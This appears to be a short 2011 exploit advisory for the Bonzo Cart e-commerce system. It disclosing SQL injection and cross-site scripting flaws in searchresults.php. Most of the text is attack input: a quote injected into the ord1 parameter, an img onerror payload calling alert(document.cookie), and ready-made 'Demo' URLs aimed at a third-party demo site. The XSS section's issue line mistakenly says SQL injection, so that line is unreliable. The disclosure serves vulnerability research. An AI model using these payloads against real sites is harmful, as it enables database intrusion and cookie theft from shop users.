Bonzo Cart (E-Commerce System) suffers from cross site scripting and remote SQL injection vulnerabilities.
3af0e196651eb510a325a1e65badd0962677f8ea312b1cbf0e71091aecc177b4
==============================
# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Example
searchresults.php?ord1=<SQL Injection
Code>&ord2=asc&search1=&SearchTerm=&where=ItemName
Exploit:
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
Demo:
http://demo.turnkeycentral.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
==============================
# Exploit Title: Bonzo Cart (E-Commerce System) Cross Site Scripting
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Example
/searchresults.php?SearchTerm=<XSS
Code>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
Exploit:
/searchresults.php?SearchTerm="%2F><%2Fa><%2F><img+src%3D1.gif+onerror%3Dalert(document.cookie)>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
Demo:
http://demo.turnkeycentral.com/bonzacart/searchresults.php?SearchTerm=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14